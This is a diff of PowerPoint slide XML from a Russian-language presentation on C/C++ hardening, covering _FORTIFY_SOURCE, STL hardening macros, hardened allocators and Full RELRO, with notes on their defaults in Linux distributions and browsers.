+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>D_FORTIFY_SOURCE=4</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              </a:rPr>
+              <a:t></a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Включена по умолчанию в компиляторе </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Ubuntu GCC (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-D_FORTIFY_SOURCE=3</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Не включена в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Debian </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
@@ -34877,60 +34776,135 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Clang)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Libc++: -D_LIBCPP_HARDENING_MODE=...</a:t>
-            </a:r>
+              <a:t>Fedora</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>включается в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Clang </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>по флагу </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Для </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Clang</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> не включена по умолчанию нигде</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Использование в реальных проектах</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>В </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Debian </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>пакеты дефолтно собираются с </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
               <a:t>-</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>stdlib</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>=libc++)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Visual Studio: -D_ITERATOR_DEBUG_LEVEL=1</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>По умолчанию не включена в компиляторах в дистрибутивах </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Debian, Ubuntu </a:t>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>D_FORTIFY_SOURCE=2</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>В </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Ubuntu </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>с </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>D_FORTIFY_SOURCE=3</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>В </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Fedora: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>пакеты дефолтно собираются с </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>D_FORTIFY_SOURCE=3</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>с 2023</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Chrome </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
@@ -34938,59 +34912,19 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Fedora</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Использование в реальных проектах:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Включена по умолчанию для пакетов </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Fedora, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>но не для </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Debian </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>и </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Ubuntu</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Google: Chrome and server systems</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId2"/>
-              </a:rPr>
-              <a:t>Retrofitting spatial safety to hundreds of millions of lines of C++</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
+              <a:t>Firefox </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>собираются с </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-D_FORTIFY_SOURCE=2</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -34999,7 +34933,7 @@
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA74AC83-3417-44E3-8294-3A7D59F0DCBA}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2953379-E1A6-429C-9D89-03490548E8EF}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -35026,7 +34960,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3217243489"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1952923550"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -35381,7 +35315,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E792084D-322A-4CB9-A936-45119E748D0D}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88930F68-01D6-4DFC-8C4B-096056195DAD}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -35399,15 +35333,15 @@
           <a:p>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Hardened allocators: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Как включить </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>?</a:t>
+              <a:t>STL hardening: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Как включить</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> ?</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -35417,7 +35351,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{383FC83D-DCD4-4DBF-AB24-B5AB31F5E207}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDEFA53E-F74E-4729-8A65-412D2CAD0540}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -35431,64 +35365,111 @@
         <p:spPr/>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit/>
+            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>О</a:t>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Libstdc++:</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>D_GLIBCXX_ASSERTIONS</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>(дефолтная </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>STL </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>GCC </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Clang)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Libc++: -D_LIBCPP_HARDENING_MODE=...</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>включается в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Clang </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>по флагу </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>-</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>бычно</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>просто </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>LD_PRELOAD=path/to/allocator.so</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Проверки в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Glibc </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>включаются по </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>MALLOC_CHECK_=3 </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>или </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>GLIBC_TUNABLES=</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>glibc.malloc.check</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>=3</a:t>
-            </a:r>
+              <a:t>stdlib</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>=libc++)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Visual Studio: -D_ITERATOR_DEBUG_LEVEL=1</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>По умолчанию не включена в компиляторах в дистрибутивах </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Debian, Ubuntu </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Fedora</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
           </a:p>
           <a:p>
             <a:r>
@@ -35500,63 +35481,35 @@
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Большинство дистрибутивов </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Linux </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>используют </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Glibc</a:t>
+              <a:t>Включена по умолчанию для пакетов </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Fedora, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>но не для </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Debian </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Ubuntu</a:t>
             </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Android </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>использует </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Scudo </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>по дефолту</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Chrome </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>использует</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> hardened-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>аллокатор </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>PartitionAlloc</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
+              <a:t>Google: Chrome and server systems</a:t>
+            </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="2"/>
@@ -35564,53 +35517,8 @@
               <a:rPr lang="en-US" dirty="0">
                 <a:hlinkClick r:id="rId2"/>
               </a:rPr>
-              <a:t>Efficient And Safe Allocations Everywhere!</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Firefox </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>использует</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>не-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>hardened </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>аллокатор</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> :(</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId3"/>
-              </a:rPr>
-              <a:t>Firefox and Chromium: Memory Allocator Hardening</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
+              <a:t>Retrofitting spatial safety to hundreds of millions of lines of C++</a:t>
+            </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
@@ -35620,7 +35528,7 @@
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57A5120B-FAAA-4EA3-9261-D059D90B41ED}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA74AC83-3417-44E3-8294-3A7D59F0DCBA}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -35647,7 +35555,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2015695599"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3217243489"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -35679,7 +35587,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24F65176-1DCF-40BE-BC3B-1D07413D3E26}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E792084D-322A-4CB9-A936-45119E748D0D}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -35697,15 +35605,15 @@
           <a:p>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Full RELRO: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Как включить</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> ?</a:t>
+              <a:t>Hardened allocators: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Как включить </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>?</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -35715,7 +35623,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B75EE06-796F-4150-9967-C80D9D14B36F}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{383FC83D-DCD4-4DBF-AB24-B5AB31F5E207}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -35735,156 +35643,180 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Опции линкера для включения </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Full RELRO:</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>О</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>бычно</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
               <a:t> </a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-Wl,-z,now -Wl,-z,relro</a:t>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>просто </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>LD_PRELOAD=path/to/allocator.so</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Проверки в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Glibc </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>включаются по </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>MALLOC_CHECK_=3 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>или </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>GLIBC_TUNABLES=</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>glibc.malloc.check</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>=3</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Использование в реальных проектах:</a:t>
             </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>В Ubuntu включены по умолчанию в GCC, но не в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Clang (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Clang </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>только </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>partial RELRO</a:t>
+              <a:t>Большинство дистрибутивов </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Linux </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>используют </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Glibc</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Android </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>использует </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Scudo </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>по дефолту</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Chrome </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>использует</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> hardened-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>аллокатор </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>PartitionAlloc</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>Efficient And Safe Allocations Everywhere!</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Firefox </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>использует</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
